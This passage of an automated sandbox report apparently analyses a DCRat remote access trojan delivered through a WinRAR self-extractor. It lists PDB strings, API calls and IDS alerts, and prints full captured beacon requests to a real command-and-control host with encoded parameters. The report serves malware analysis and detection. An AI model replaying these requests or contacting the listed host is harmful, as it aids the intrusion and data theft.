            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Setupx-64.exe
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: zC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: hC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: xC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: oC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.000000000618A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: ~C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: iC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: lfons\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*Rea)G{pt source: upfc.exe, 00000014.00000002.2680004850.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: gC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008BA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_008BA5F4
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_008CB8E0
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008DAAA8 FindFirstFileExA,0_2_008DAAA8
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 4x nop then jmp 00007FF7C83F527Dh20_2_00007FF7C83F5205

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49692 -> 141.8.192.84:80
            Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.84:80 -> 192.168.2.5:49696
            Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.84:80 -> 192.168.2.5:49728
            Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?m8gxGXCVv2=scSV9HzuSwMCjdTswbhT&RDrNbKAEY3sTBn6jEsDoIMfa=7UwoQ3Nj2bYlHh7zq43dti0XJstdpl&38d296bf10b75f50288ff78c7ce8263b=886958ac912bd532dd3d39de1ccac832&a67d1e031b8c1e808a6c381772ce6495=QZ1QWO5EWZzMTMlJGM2MDMhZjZ1EjY1ImM1gTOxMTM2kDZkBzNygTM&m8gxGXCVv2=scSV9HzuSwMCjdTswbhT&RDrNbKAEY3sTBn6jEsDoIMfa=7UwoQ3Nj2bYlHh7zq43dti0XJstdpl HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIwQTMkJzYmNzM4UDZ5YWO3ETZwMjM0Q2M2EGO5kzM2kjNmRzYzYDO1IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&b19debc3db097a2b331de9c72156aebb=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTnFkaNZTQE5kNVRVTnVlaNdXS6xEMBpHT5VkeXJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIwQTMkJzYmNzM4UDZ5YWO3ETZwMjM0Q2M2EGO5kzM2kjNmRzYzYDO1IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiImNjNwgDZyEDMwkjYjVDN4ETNyITM4EGNlRWY4EWM1ADMjFjMzIjM2IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&b19debc3db097a2b331de9c72156aebb=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 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSz